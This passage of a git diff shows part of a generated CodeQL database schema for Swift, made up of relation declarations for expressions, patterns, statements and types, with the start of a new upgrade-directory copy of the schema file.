//dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int 
base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( 
//dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] 
+interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int 
id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: 
@dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: 
@is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| 
@pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| 
@labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: 
@repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + 
+#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: 
@parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type 
+); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: 
@unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + 
+enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + 
+@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme new file mode 100644 index 00000000000..33db81ad4b6 --- /dev/null +++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme 
@@ -0,0 +1,2793 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: 
@availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] 